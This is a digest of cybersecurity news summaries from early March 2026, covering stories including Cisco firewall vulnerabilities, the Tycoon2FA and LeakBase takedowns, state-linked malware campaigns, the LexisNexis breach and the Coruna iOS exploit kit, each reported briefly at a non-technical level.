Meta's smart AI glasses, developed with Ray-Ban, face scrutiny after reports revealed that intimate images and videos captured by users were accessed by outsourced workers for content labeling. An investigation highlighted privacy concerns, including unauthorized recordings in private settings. The Information Commissioner’s Office is questioning Meta's data processing transparency and compliance with UK regulations. Meta claims to have privacy protections, but concerns persist about user consent and data handling practices.
2026-03-06 | DIGIT: Meta Smart Glasses Under Scrutiny Over Data Privacy Concerns
Meta's AI smart glasses, developed with Ray-Ban, face scrutiny over privacy issues after reports revealed that intimate images and videos captured by users were viewed by outsourced workers at a third-party firm, Sama. The Information Commissioner’s Office (ICO) is investigating whether Meta adequately communicates data processing practices to users. Concerns include unauthorized recordings and the handling of sensitive imagery. Meta claims to have privacy protections in place, but the investigation raises significant questions about user consent and data transparency.
Cisco fixes maximum-severity Secure FMC bugs threatening firewall security
Date: 2026-03-04 | Source: Security Affairs
Cisco patched two critical vulnerabilities in its Secure Firewall Management Center (FMC) that could allow attackers to gain root access. CVE-2026-20079, an authentication bypass issue, enables unauthenticated remote attackers to execute scripts via crafted HTTP requests (CVSS 10.0). CVE-2026-20131, a remote code execution flaw, allows execution of arbitrary Java code as root through insecure deserialization (CVSS 10.0). No workarounds exist, and Cisco is unaware of any active exploitation.
2026-03-05 | Cyber Security News: Cisco Secure Firewall Management Vulnerability Allow Attackers to Bypass Authentication
Cisco has issued a critical advisory regarding a vulnerability in its Secure Firewall Management Center (FMC) Software, tracked as CVE-2026-20079. This flaw allows unauthenticated remote attackers to bypass authentication and execute scripts, gaining full root access. The vulnerability, with a CVSS score of 10.0, requires immediate attention. No workarounds exist; Cisco urges organizations to upgrade to fixed software versions. The advisory was published on March 4, 2026, following discovery by researcher Brandon Sakai.
2026-03-05 | Infosecurity Magazine: Cisco Issues Patches for 48 Vulnerabilities in Enterprise Networking Products
Cisco released 25 security advisories on March 4, addressing 48 vulnerabilities in its Secure Firewall ASA, FMC, and FTD products. The most critical flaws, CVE-2026-20079 and CVE-2026-20131, both rated CVSS 10, allow for authentication bypass and remote code execution, respectively. No workarounds exist; customers are urged to upgrade to the patched software. The remaining fixes cover 15 high-severity (CVSS 7.2-8.6) and 31 medium-severity (CVSS 4.3-6.8) vulnerabilities.
2026-03-05 | Cyber Security News: Cisco Secure Firewall Management Vulnerability Enables Remote Code Execution
Cisco has issued a security advisory for a critical vulnerability in its Secure Firewall Management Center (FMC) software, rated CVSS 10.0. This flaw allows remote, unauthenticated attackers to execute arbitrary code, gaining root-level control. It arises from insecure deserialization in the web interface. Affected systems include Cisco Secure FMC and Cisco Security Cloud Control, while ASA and FTD software are not vulnerable. No workarounds exist; organizations must apply updates to mitigate risks. Prompt remediation is essential.
2026-03-05 | Cyberscoop: Cisco reveals 2 max-severity defects in firewall management software
Cisco disclosed two critical vulnerabilities in its firewall management software, CVE-2026-20079 and CVE-2026-20131, which could allow unauthenticated remote attackers to gain root access to affected devices. CVE-2026-20079 enables script execution via an authentication bypass, while CVE-2026-20131 is a deserialization flaw allowing remote code execution. Cisco urges customers to upgrade to patched software, as there are no workarounds. The vulnerabilities were part of a biannual update addressing 48 issues across multiple products.
2026-03-05 | CSO Online: Cisco issues emergency patches for critical firewall vulnerabilities
Cisco released emergency patches on March 4, 2026, addressing 25 security advisories and 48 CVEs for its firewall products. Notably, two critical vulnerabilities in the Secure Firewall Management Center (FMC) Software, CVE-2026-20079 (authentication bypass) and CVE-2026-20131 (insecure deserialization), both received maximum CVSS scores of 10. This update represents one of the largest patching efforts for Cisco's firewall products.
2026-03-06 | Hack Read: Cisco Patches 48 Firewall Vulnerabilities with Two CVSS 10 Flaws
Cisco has released security updates for 48 vulnerabilities across its firewall platforms, including Cisco Secure Firewall Adaptive Security Appliance and Management Center. Notably, two critical flaws (CVE-2026-20079 and CVE-2026-20131) have a CVSS score of 10, allowing for authentication bypass and remote code execution, respectively. Cisco recommends immediate upgrades to patched software versions, as there are no temporary fixes. The advisory also includes 15 high-severity and 31 medium-severity vulnerabilities.
Global Takedown Neutralizes Tycoon2FA Phishing Service
Date: 2026-03-04 | Source: Infosecurity Magazine
Over 300 domains linked to the Tycoon2FA phishing-as-a-service operation were seized in a global takedown led by Microsoft and Europol. Tycoon2FA, operational since August 2023, had around 2000 users and utilized adversary-in-the-middle techniques to bypass multi-factor authentication, compromising enterprise accounts. Security experts emphasize the need for organizations to enhance resilience against such threats, as the primary operator remains unidentified. Recommendations for defense were provided by TrendAI.
2026-03-04 | Microsoft Security: Inside Tycoon2FA: How a leading AiTM phishing kit operated at scale
Tycoon2FA, a phishing-as-a-service platform launched in August 2023, has enabled extensive phishing campaigns targeting over 500,000 organizations monthly. Developed by Storm-1747, it allows attackers to bypass multifactor authentication (MFA) using adversary-in-the-middle techniques. The service has been disrupted by Microsoft and Europol. Tycoon2FA employs sophisticated evasion tactics, including custom CAPTCHAs and dynamic redirects, making detection challenging. Recommendations include adopting phishing-resistant MFA and utilizing Microsoft Defender for threat detection and response.
2026-03-04 | Cyber Security News: Tycoon 2FA Phishing Kit Disrupted by Microsoft, Europol and Partners
Microsoft, Europol, and partners dismantled the Tycoon 2FA phishing-as-a-service platform, seizing 330 domains used for credential theft and MFA bypass. Active since 2023, it accounted for 62% of phishing attempts blocked by Microsoft, impacting over 500,000 organizations globally. The operation disrupted a surge in phishing activity, dropping messages by 57.6% post-seizure. Recommendations include deploying phishing-resistant MFA, monitoring for anomalies, and joining ISACs for shared intelligence.
2026-03-04 | Cyberscoop: Global coalition dismantles Tycoon 2FA phishing kit
A global coalition led by Microsoft dismantled the Tycoon 2FA phishing kit on Wednesday, seizing 330 domains linked to its infrastructure. Tycoon 2FA, operational since August 2023, was responsible for over 30 million phishing messages monthly, targeting more than 500,000 organizations, particularly in education and healthcare. Microsoft and Health-ISAC filed a civil complaint against its creator, seeking a $10 million injunction. The operation involved authorities from six countries and multiple security firms.
2026-03-05 | CSO Online: Microsoft leads takedown of Tycoon2FA phishing service infrastructure
The Tycoon2FA phishing service infrastructure has been dismantled through a coordinated effort led by Microsoft and Europol, involving multiple law enforcement agencies. A US court order enabled Microsoft to seize 330 active domains associated with Tycoon2FA, which was a significant tool for bypassing multifactor authentication. Law enforcement in Latvia, Lithuania, Portugal, Poland, Spain, and the UK also participated in seizing the service's infrastructure, temporarily disrupting this major phishing operation.
2026-03-05 | The Hacker News: Europol-Led Operation Takes Down Tycoon 2FA Phishing-as-a-Service Linked to 64,000 Attacks
Europol-led efforts dismantled Tycoon 2FA, a major phishing-as-a-service toolkit linked to over 64,000 attacks, impacting nearly 100,000 organizations globally. The service, operational since August 2023, facilitated adversary-in-the-middle credential harvesting, generating millions of phishing emails monthly. Key features included a web-based panel for campaign management and real-time data capture. The operation resulted in the takedown of 330 domains supporting the service, which targeted various sectors, including education and healthcare.
2026-03-05 | Help Net Security: Authorities pull plug on Tycoon 2FA phishing-as-a-service platform
Authorities have disrupted Tycoon 2FA, a phishing-as-a-service platform active since August 2023, which enabled cybercriminals to bypass multi-factor authentication (MFA). At its peak, it accounted for 62% of phishing attempts blocked by Microsoft. Investigators took down 330 domains linked to the service, which generated tens of millions of phishing emails monthly and affected nearly 100,000 organizations globally, including schools and hospitals. The operation was coordinated by Europol with support from Microsoft and law enforcement across several countries.
2026-03-05 | TechRadar: Microsoft, Europol take down global phishing as a service network which was able to bypass 2FA with ease
Europol led a multinational operation to dismantle Tycoon 2FA, a major phishing-as-a-service platform active since August 2023. The operation involved police from several countries and resulted in the seizure of 330 domains used for phishing. Tycoon 2FA enabled unauthorized access to nearly 100,000 organizations, generating tens of millions of phishing emails monthly. The platform, which utilized adversary-in-the-middle attacks, reportedly earned over $400,000 in cryptocurrency before its takedown.
2026-03-05 | Recorded Future: Police dismantle major phishing platform blamed for attacks on hospitals and schools
International law enforcement has dismantled the Tycoon 2FA phishing-as-a-service platform, which targeted over 500,000 accounts, including those of hospitals and schools. Authorities seized 330 domains used for phishing operations. Active since 2023, Tycoon 2FA sent tens of millions of phishing emails monthly and was responsible for 62% of phishing attempts blocked by Microsoft. The platform allowed attackers to bypass multi-factor authentication, leading to operational disruptions in healthcare and education sectors.
2026-03-05 | Hack Read: Authorities Shut Down Tycoon 2FA Phishing Platform Used to Bypass MFA
A coordinated international operation led by Europol has dismantled the Tycoon 2FA phishing platform, which enabled large-scale credential theft by bypassing multi-factor authentication. The operation seized around 330 domains and disrupted the infrastructure used for phishing campaigns targeting over 500,000 organizations. Tycoon 2FA utilized adversary-in-the-middle phishing, capturing session tokens to maintain access. The platform, which emerged in August 2023, was linked to tens of millions of phishing emails monthly.
2026-03-05 | Cybersecurity Dive: Microsoft, Europol disrupt global phishing platform Tycoon 2FA
An international coalition led by Microsoft and Europol has dismantled the Tycoon 2FA phishing platform, which compromised over 96,000 victims globally since 2023, including more than 55,000 Microsoft customers. A U.S. court ordered the seizure of 330 domains supporting Tycoon 2FA's operations. The platform harvested credentials from Gmail and Microsoft 365 accounts, significantly impacting businesses and healthcare providers, with Health-ISAC reporting severe operational disruptions in medical facilities.
Surge in Attacks on Surveillance Cameras Linked to Iranian Hackers
Date: 2026-03-04 | Source: Infosecurity Magazine
A surge in attacks on internet-connected surveillance cameras in the Middle East, attributed to Iranian hackers, began intensifying on February 28, affecting Israel, Qatar, Bahrain, Kuwait, the UAE, and Cyprus. Check Point Research identified exploitation attempts targeting Hikvision and Dahua devices, focusing on vulnerabilities like CVE-2021-33044 and CVE-2017-7921. Recommendations include removing WAN access, using strong credentials, and monitoring for unusual activity to mitigate risks.
2026-03-04 | Cybersecurity Dive: Iran-nexus hackers target flaws in surveillance cameras
Iran-linked hackers are exploiting critical vulnerabilities in IP cameras, specifically targeting Hikvision and Dahua products since late February. Key flaws include CVE-2023-6895 and CVE-2025-34067 in Hikvision's Intercom Broadcasting System, and CVE-2021-33044 in certain Dahua devices. The attacks have primarily affected countries in the Persian Gulf and Middle East, with a noted connection to prior conflicts involving Israel and Iran. The hackers are linked to the Islamic Revolutionary Guard Corps (IRGC).
2026-03-04 | The Register: 'Hundreds' of Iranian hacking attempts have hit surveillance cameras since the missile strikes
Multiple Iranian hacking crews have targeted internet-connected surveillance cameras in Israel and other Middle Eastern countries since February 28, exploiting vulnerabilities in Hikvision and Dahua products. Check Point researchers identified hundreds of attempts, linking them to potential physical attacks. Key vulnerabilities include CVE-2017-7921, CVE-2021-36260, CVE-2023-6895, CVE-2025-34067, and CVE-2021-33044. Recommendations include updating firmware, removing WAN access, and isolating cameras on dedicated VLANs.
2026-03-05 | Cyber Security News: Threat Actors Intensify Targeting of IP Cameras Across Middle East Amid Ongoing Conflict
Threat actors are increasingly targeting IP cameras in the Middle East, exploiting vulnerabilities amid ongoing regional conflicts. The attacks aim to gain unauthorized access to surveillance systems, potentially compromising sensitive information and security operations. Organizations are urged to enhance their security measures, including updating firmware, changing default passwords, and implementing network segmentation to protect against these threats.
2026-03-06 | Risky.Biz: Risky Bulletin: Iranian hackers are scanning for security cameras to aid missile strikes
A spike in scanning for internet-exposed security cameras in Israel and the Middle East has been linked to an Iranian hacking group amid military tensions. The scans targeted Hikvision and Dahua cameras, aiming to exploit vulnerabilities for reconnaissance during missile strikes. Similar tactics were noted in past conflicts, indicating a trend in using hacked cameras for military intelligence. Security experts recommend securing these devices to mitigate risks associated with their exploitation.
2026-03-06 | Wired: From Ukraine to Iran, Hacking Security Cameras Is Now Part of War’s ‘Playbook’
Check Point's research reveals hundreds of hacking attempts targeting consumer-grade security cameras in the Middle East, linked to Iranian military activities amid escalating tensions. The attacks exploited five vulnerabilities in Hikvision and Dahua cameras, which had been previously patched. The attempts coincided with US and Israeli air strikes on Iran, with Check Point attributing the efforts to Iranian hacker groups, including Handala, associated with Iran's Ministry of Intelligence and Security.
2026-03-07 | Security Affairs: Iran-linked hackers target IP cameras across Israel and Gulf states for military intelligence
Iran-linked hackers have targeted IP cameras in Israel and Gulf states for military intelligence, as reported by Check Point on March 7, 2026. Attacks focused on vulnerabilities in Hikvision and Dahua cameras, including CVE-2017-7921 and CVE-2021-33044. The activity surged around geopolitical tensions, with reconnaissance efforts noted during conflicts. Recommendations include securing cameras behind VPNs, changing default passwords, and monitoring for suspicious activity to mitigate risks.
Russian hackers deploy new malware in phishing campaign targeting Ukraine
Date: 2026-03-04 | Source: Recorded Future
Researchers have identified a Russian espionage campaign targeting Ukraine using two new malware strains: BadPaw and MeowMeow. The attack begins with a phishing email containing a malicious document that downloads BadPaw, which installs MeowMeow, a backdoor allowing file manipulation. Both malware strains evade detection by terminating when they detect a research or analysis environment. The campaign is attributed to a Russian state-aligned actor, potentially APT28, and utilizes phishing emails from the Ukrainian service ukr.net. Targets were not specified.
2026-03-04 | Infosecurity Magazine: Multi-Stage "BadPaw" Malware Campaign Targets Ukraine
A newly identified malware campaign named "BadPaw" targets Ukraine, utilizing a Ukrainian email service for credibility. The attack begins with an email link that redirects victims to a tracking pixel before delivering a disguised HTA application. The malware checks the system's installation date to avoid detection and uses a scheduled task for persistence. It connects to a C2 server to deploy a backdoor, "MeowMeowProgram[.]exe," featuring multiple defensive layers and Russian-language strings, suggesting a possible Russian developer.
2026-03-05 | The Hacker News: APT28-Linked Campaign Deploys BadPaw Loader and MeowMeow Backdoor in Ukraine
Cybersecurity researchers have uncovered a Russian cyber campaign targeting Ukrainian entities, deploying two new malware families: BadPaw and MeowMeow. The attack begins with a phishing email leading to a ZIP file containing an HTA file that displays a decoy document while executing malicious actions. BadPaw, a .NET loader, fetches the MeowMeow backdoor, which can execute PowerShell commands and manipulate files. The campaign is attributed to APT28, based on targeting patterns and language used in the malware.
2026-03-05 | Security Affairs: Russian APT targets Ukraine with BadPaw and MeowMeow malware
A Russian cyberespionage campaign targets Ukrainian entities using new malware families BadPaw and MeowMeow, delivered via phishing emails. The attack begins with a ZIP archive containing an HTA file that lures victims with a decoy document about border crossing appeals. BadPaw, a .NET loader, establishes C2 communication to deploy the MeowMeow backdoor. Both malware strains utilize obfuscation techniques to evade detection, and the campaign is attributed to a Russia-linked group, likely APT28, based on targeting and tactics.
United States Leads Dismantlement of One of the World’s Largest Hacker Forums
Date: 2026-03-04 | Source: US Department of Justice
The U.S. Department of Justice announced the seizure of LeakBase, a major cybercriminal forum with over 142,000 members, on March 3-4. The operation involved 14 countries and resulted in the shutdown of the forum, seizure of its data, and arrests. LeakBase facilitated the sale of stolen personal and banking information. Law enforcement agencies, including the FBI and Europol, emphasized the importance of international cooperation in combating cybercrime. The investigation is ongoing, with significant assistance from various international authorities.
2026-03-04 | Cyber Security News: Operation Leak Dismantles LeakBase Cybercriminal Forum – User Data, IP Logs Secured by Authorities
The FBI, in collaboration with international law enforcement, has seized the cybercriminal forum LeakBase, known for trading stolen databases, under “Operation Leak.” The domains now redirect to an FBI seizure banner. Legal actions were based on U.S. and German court orders. All user data, including accounts and IP logs, has been secured as evidence. Authorities encourage former users to report to a dedicated tip line. This operation significantly impacts the data-leak forum ecosystem.
2026-03-04 | Recorded Future: Sprawling FBI, European operation takes down Leakbase cybercriminal forum
The FBI and European law enforcement dismantled the Leakbase cybercriminal forum, which sold stolen credentials and exploits. The operation, named “Operation Leak,” involved 100 actions against 45 targets across multiple countries, resulting in 13 arrests and the seizure of the forum's database. Leakbase had over 142,000 members and facilitated access to U.S. networks. The investigation, ongoing for years, revealed the forum's significant role in cybercrime, impacting various businesses.
2026-03-04 | Cyberscoop: Authorities from 14 countries shut down major cybercrime forum LeakBase
Authorities from 14 countries, including the FBI and Europol, shut down the cybercrime forum LeakBase, which had over 142,000 members and hosted a vast archive of hacked databases. The operation resulted in multiple arrests and the seizure of domains, user accounts, and sensitive data. LeakBase specialized in leaked databases and stealer logs, with over 32,000 posts. The takedown aimed to disrupt platforms facilitating data theft and hold cybercriminals accountable globally.
2026-03-04 | TechCrunch: US and EU police shut down LeakBase, a site accused of sharing stolen passwords and hacking tools
U.S. and European law enforcement have seized LeakBase, a major cybercriminal forum with over 142,000 members, known for sharing stolen passwords and hacking tools. Operating since 2021, it maintained a vast archive of hacked databases, including millions of credentials and financial information. The takedown involved around 100 global enforcement actions and targeted the top 37 users. The FBI redirected the domain to its servers, preserving the forum's contents and logs, leading to 13 arrests and investigations of 33 suspects.
2026-03-05 | The Hacker News: FBI and Europol Seize LeakBase Forum Used to Trade Stolen Credentials
A joint operation by the FBI and Europol has dismantled LeakBase, a major forum for trading stolen data, with over 142,000 members. The site, now seized, hosted hacked databases and sensitive information. The operation, named "Operation Leak," occurred on March 3-4, 2026, involving global enforcement actions, including arrests and interviews in multiple countries. Authorities secured all forum content for evidence, targeting users involved in selling stealer logs and facilitating cyber intrusions.
2026-03-05 | Help Net Security: LeakBase cybercrime forum with 142,000 users taken down in global operation
LeakBase, a cybercrime forum with 142,000 users, was dismantled in a global operation led by Europol and 14 countries. Active since 2021, it facilitated the trade of leaked databases and stolen credentials. Authorities seized its database, enabling the identification of users who thought they were anonymous. The takedown occurred in two phases: arrests and searches on March 3, followed by domain seizure on March 4. The operation aims to deter future cybercrime and raise awareness of its consequences.
2026-03-05 | Security Affairs: Operation Leak: FBI and Europol dismantle LeakBase Cybercrime forum
The FBI and Europol dismantled the LeakBase cybercrime forum on March 3, 2026, as part of "Operation Leak," involving 14 countries. The forum, active since 2021, facilitated the trade of hacking tools and stolen data, boasting over 142,000 users. Law enforcement conducted around 100 interventions targeting key users and seized the forum's domain. The operation aimed to deter cybercrime and raise awareness about the risks of stolen data, emphasizing the need for strong passwords and multi-factor authentication.
2026-03-05 | Infosecurity Magazine: Europol Operation Seizes LeakBase Data Breach Site
Europol coordinated a global operation on March 3, 2026, leading to the takedown of LeakBase, a major forum for stolen data with over 142,000 users. Law enforcement in the US, Australia, and several European countries targeted 37 active users, seizing two domains and the customer database. The operation aims to disrupt the illegal trade in stolen credentials, which has seen a significant rise in thefts. Europol emphasized its commitment to holding cybercriminals accountable.
2026-03-05 | TechRadar: Major data leak forum LeakBase seized by FBI, Europol, and shut down
Europol, in collaboration with the FBI, dismantled the LeakBase underground data forum, which had over 142,000 users trading stolen data. On March 3, 2026, law enforcement conducted around 100 actions, including arrests and house searches targeting 37 active users. The forum's domain was seized and defaced, with its database confiscated to deanonymize users. Authorities did not disclose the number of arrests or specific charges. This operation underscores the reach of international law enforcement in combating cybercrime.
2026-03-05 | CSO Online: Europol shuts down huge market for stolen data
Europol announced the closure of LeakBase, one of the largest marketplaces for stolen data, during an international operation. The Amsterdam police reported that LeakBase had 142,000 registered users and its servers were located in Amsterdam. On a coordinated action day, investigators from 14 countries conducted around 100 operations targeting the platform's 37 main users. Europol described LeakBase as a central hub in the cybercrime ecosystem, specializing in the trade of stolen data.
2026-03-05 | CSO Online: Europol: large market for stolen data closed
Europol announced the closure of Leakbase, one of the world's largest marketplaces for stolen data, during an international operation led by the Amsterdam police. The platform had 142,000 registered users and was accessible on the open internet. On a coordinated action day involving 14 countries, approximately 100 operations targeted the 37 main users of the site. Europol described Leakbase as a central hub in the cybercrime ecosystem specializing in the trade of stolen data.
2026-03-05 | Hack Read: LeakBase Cybercrime and Hacker Forum Seized
In early March 2026, an international law enforcement operation led by Europol dismantled the LeakBase cybercrime forum, which specialized in trading stolen databases and credentials. Authorities from 14 countries seized the forum's domains and backend data, executing around 100 enforcement actions, including arrests. LeakBase had over 142,000 registered members and facilitated account takeover attacks and fraud. The operation aimed to disrupt cybercrime infrastructure, although similar forums may quickly reemerge.
2026-03-06 | CSO Online: LeakBase marketplace unplugged by cops in 14 countries
The LeakBase cyberforum, a major marketplace for stolen data and cybercrime tools, was seized by US authorities with coordinated actions in 14 countries. The US Department of Justice announced that law enforcement captured data and two domains associated with the forum, which had 142,000 users. Arrests were made and search warrants executed in the US, Australia, Belgium, Poland, Portugal, Romania, Spain, and the UK. "Prevention messages" were also sent to members of LeakBase.
APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2
Date: 2026-03-04 | Source: The Hacker News
Cybersecurity researchers have identified the APT group Silver Dragon, linked to attacks on government entities in Europe and Southeast Asia since mid-2024. Silver Dragon exploits public-facing servers and uses phishing emails for initial access. The group deploys Cobalt Strike beacons and uses DNS tunneling among its command-and-control channels. Three infection chains were identified: AppDomain hijacking, service DLL, and phishing. The group also deploys various post-exploitation tools, including a backdoor that communicates via Google Drive.
APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2
2026-03-04 | Security Affairs: From phishing to Google Drive C2: Silver Dragon expands APT41 playbook
APT group Silver Dragon, linked to APT41, has been targeting government entities in Europe and Southeast Asia since mid-2024. They exploit public-facing servers and use phishing emails with malicious attachments for initial access. Their tactics include AppDomain hijacking, deploying Cobalt Strike beacons, and utilizing Google Drive for command-and-control. Tools like MonikerLoader and BamboLoader facilitate payload injection and persistence. The group shows advanced capabilities with custom tools for data exfiltration and lateral movement.
2026-03-04 | Cyber Security News: Silver Dragon APT Group Targets Europe, Asia Using Google Drive for Covert Communication
A China-linked APT group, Silver Dragon, has been targeting government and high-profile organizations in Europe and Southeast Asia since mid-2024. They exploit public-facing servers and use phishing emails to deploy Cobalt Strike beacons for control. Their primary tool, GearDoor, utilizes Google Drive for command-and-control, making detection challenging. Recommendations include monitoring cloud storage traffic, auditing Windows services, and enhancing phishing awareness training for government personnel.
2026-03-05 | TechRadar: Chinese hackers hide malware within Windows and Google Drive to hit government targets
Chinese state-backed group Silver Dragon has been targeting government entities in Europe and Asia since mid-2024, utilizing phishing emails and compromised servers for cyber-espionage. They employ a custom backdoor, GearDoor, which uses Google Drive for command-and-control, allowing covert data exfiltration. The group also hijacks legitimate Windows services to load malicious code, blending into normal system activity to evade detection. This tactic increases risk by exploiting trusted cloud services and operating system components.
LexisNexis Data Breach — Threat Actor Allegedly Claims 2.04 GB Stolen
Date: 2026-03-03 | Source: Cyber Security News
A threat actor named FulcrumSec claimed responsibility for a breach of LexisNexis, alleging the theft of 2.04 GB of data from its AWS infrastructure. Initial access was gained on February 24, 2026, by exploiting the unpatched React2Shell vulnerability. The breach exposed 3.9 million database records, 400,000 cloud user profiles (including 118 .gov email accounts), and 21,042 employee password hashes. FulcrumSec criticized LexisNexis for poor security practices, including weak password management.
LexisNexis Data Breach — Threat Actor Allegedly Claims 2.04 GB Stolen
2026-03-03 | Recorded Future: LexisNexis says hackers accessed legacy data in contained breach
LexisNexis confirmed a contained breach where hackers accessed legacy data, including millions of records and .gov email addresses. The breach involved 2 GB of information from a limited number of servers, primarily containing data prior to 2020, such as customer names, user IDs, and support tickets. The company stated there was no evidence of compromise to its products and services and has engaged a cybersecurity firm for investigation. Impacted customers have been notified.
2026-03-04 | TechRadar: LexisNexis confirms data breach, says hackers hit customer and business info
American analytics firm LexisNexis confirmed a data breach involving outdated data, stating that hackers accessed legacy information dating from before 2020. The group FulcrumSec leaked 2GB of files, asserting they accessed sensitive data, including hundreds of government user records and 400,000 cloud user profiles. LexisNexis stated no sensitive personally identifiable information or financial data was compromised. The company believes the attack is contained and did not engage with the hackers' ransom demands.
2026-03-04 | The Register: LexisNexis confirms data breach at Legal & Professional arm, some customer records affected
LexisNexis confirmed a data breach in its Legal & Professional division, attributed to the Fulcrumsec cybercrime group. The breach involved limited access to legacy data, including customer names, user IDs, and business contact information, but did not expose sensitive PII or financial data. Fulcrumsec claims to have exfiltrated over 2 GB of data, including 400,000 user profiles and details on government staff. LexisNexis is investigating and has engaged a third-party forensics team for remediation.
AI and Deepfakes Supercharge Sophisticated Cyber-Attacks, Says Cloudflare
Date: 2026-03-03 | Source: Infosecurity Magazine
The 2026 Cloudflare Threat Report highlights how AI and large language models (LLMs) have lowered the barrier for cybercriminals, enabling rapid and effective cyber-attacks. Threat actors, including state-sponsored groups, use LLMs for crafting convincing phishing emails and malware. Notably, AI deepfakes are being employed to infiltrate organizations, posing as legitimate employees. Cloudflare warns of the "industrialization of cyber threats," urging organizations to adopt proactive, real-time intelligence strategies to combat evolving tactics.
AI and Deepfakes Supercharge Sophisticated Cyber-Attacks, Says Cloudflare
2026-03-03 | Help Net Security: Cloudflare tracked 230 billion daily threats and here is what it found
Cloudflare's 2026 cyber threat report reveals it blocks over 230 billion threats daily, highlighting a shift in attack methods. Infostealers like LummaC2 are now extracting session tokens, leading to 54% of ransomware attacks. Bots account for 94% of login attempts, with many using compromised credentials. Threat actors exploit cloud services for attacks, while phishing exploits email authentication gaps. DDoS attacks doubled in 2025, with a record 31.4 Tbps attack. North Korean operatives use deepfake profiles to infiltrate Western organizations.
2026-03-03 | DIGIT: Bots Now Behind 94% of Fraudulent Logins, Warns Cloudflare
Cloudflare's 2026 Threat Report reveals that bots account for 94% of fraudulent logins, with AI being exploited by both state-sponsored and independent cybercriminals. Notable tactics include using AI for network mapping and deepfake creation. North Korean operatives are infiltrating Western payrolls, while Chinese-linked groups target critical infrastructure in North America. DDoS attacks have surged, with botnets like Aisuru capable of overwhelming networks. Organizations are urged to adopt proactive intelligence-driven security measures.
2026-03-04 | Cyber Security News: New Threat Report Warns of AI is Automating High-Velocity Attacker Operations
On March 3, 2026, Cloudflare released its inaugural Threat Report, which highlights the rapid evolution of cyber attacks driven by AI. Key findings include the rise of token theft, hyper-volumetric DDoS attacks reaching 31.4 Tbps, and state-sponsored groups exploiting deepfakes for espionage. Attackers now utilize trusted tools for command-and-control, complicating detection. Recommendations include adopting autonomous defenses, enforcing email authentication protocols, and implementing Zero Trust access controls to counter these threats effectively.
2026-03-04 | TechRadar: 'The total industrialization of cyber threats': Cloudflare report outlines how hackers are 'weaponizing the Internet'
Cloudflare's 2026 Threat Report reveals a significant shift in cyberattacks driven by Generative AI (GenAI), marking the first recorded AI-based attack that compromised hundreds of corporate tenants. The report highlights the rise of DDoS attacks, with botnets like Aisuru posing nation-state level threats, and emphasizes the need for organizations to adopt real-time intelligence to counter evolving tactics. North Korean groups are also leveraging AI for espionage, using deepfakes to infiltrate companies.
Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit
Date: 2026-03-03 | Source: Google Cloud
Google Threat Intelligence Group has identified the "Coruna" exploit kit targeting iPhones running iOS 13.0 to 17.2.1, containing 23 exploits and advanced non-public techniques. Initially used by a surveillance vendor's customer, it was later deployed in attacks by UNC6353 and UNC6691. The kit highlights a market for second-hand zero-day exploits. Users are urged to update to the latest iOS version for protection, and if updates are not possible, to enable Lockdown Mode for enhanced security.
Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit
2026-03-03 | Help Net Security: Coruna: Spy-grade iOS exploit kit powering financial crime
A powerful iOS exploit kit named "Coruna" has been linked to various threat actors, evolving from surveillance to financial crime. It contains five exploit chains and 23 exploits, including CVE-2024-23222 and CVE-2022-48503. Targeting iOS versions 13.0 to 17.2.1, it was first observed in February 2025. The kit can exfiltrate sensitive information from crypto-wallet apps. Users are advised to upgrade to the latest iOS version or use Lockdown Mode to mitigate risks.
2026-03-03 | Wired: A Possible US Government iPhone-Hacking Toolkit Is Now in the Hands of Foreign Spies and Criminals
A sophisticated iPhone-hacking toolkit named "Coruna," capable of exploiting 23 iOS vulnerabilities, has transitioned from Russian espionage to cybercriminal use targeting Chinese-speaking victims. Google researchers linked Coruna to a US government contractor, suggesting it may have originated as a government tool. The toolkit's proliferation raises concerns about the security of mobile devices, paralleling the infamous EternalBlue incident. Google warns of an active market for second-hand zero-day exploits.
2026-03-03 | Cyberscoop: Possible U.S.-developed exploits linked to first known ‘mass’ iOS attack
An exploit kit, potentially derived from a leaked U.S. government framework, is linked to the first mass-scale attack on iOS, affecting at least 42,000 devices. Researchers from Google and iVerify noted its use by Chinese cybercriminals and in Russian attacks on Ukraine. The Coruna exploit kit exemplifies the proliferation of sophisticated zero-day exploits. Apple has issued multiple patches in response, while the NSA declined to comment on allegations of U.S. involvement.
2026-03-03 | TechCrunch: A suite of government hacking tools targeting iPhones is now being used by cybercriminals
A suite of hacking tools, dubbed Coruna, originally developed for government use, has been identified as being exploited by cybercriminals to compromise Apple iPhones running older software. Google discovered the kit in February 2025, initially linked to a surveillance vendor's attempt to hack a phone. The tools can bypass iPhone defenses via malicious websites, affecting devices from iOS 13 to 17.2.1. iVerify suggests the tools may be linked to the U.S. government, highlighting risks of government exploits leaking to malicious actors.
2026-03-04 | Cyber Security News: Coruna Exploit Kit With 23 Exploits Hacked Thousands of iPhones
Google's Threat Intelligence Group uncovered the Coruna exploit kit, a sophisticated iOS attack framework with 23 exploits targeting iPhones running iOS 13.0 to 17.2.1. It evolved through three phases in 2025, from commercial surveillance to state-sponsored espionage and financial fraud. Key CVEs include CVE-2021-30952 and CVE-2023-43000. The final payload, PlasmaLoader, targets cryptocurrency wallets and Apple Notes. Users are advised to update iOS, enable Lockdown Mode, and avoid unverified financial sites.
2026-03-04 | TechRadar: iPhones targeted by 'new and powerful' malware - and "Coruna" may have been developed by the US government
A complex exploit kit named "Coruna," targeting iPhones, has been discovered by Google researchers. Initially used by a surveillance software customer, it has since been employed by Russian and Chinese threat actors. The kit, potentially developed by the US government, contains 23 exploits for mass attacks on devices running iOS 13.0 to 17.2.1. Users are advised to upgrade their iOS or enable Lockdown Mode for protection. The kit aims to access financial and personal information.
2026-03-04 | The Hacker News: Coruna iOS Exploit Kit Uses 23 Exploits Across Five Chains Targeting iOS 13–17.2.1
Google identified the Coruna exploit kit targeting iOS 13–17.2.1, featuring 23 exploits across five chains. Active since February 2025, it evolved from commercial surveillance to government and criminal use. Key CVEs include CVE-2024-23222 and CVE-2023-43000. The kit employs a JavaScript framework for device fingerprinting and exploits delivery. Notably, it avoids execution in Lockdown Mode. Users are advised to update devices and enable Lockdown Mode for enhanced security.
2026-03-05 | Security Affairs: Google uncovers Coruna iOS Exploit Kit targeting iOS 13–17.2.1
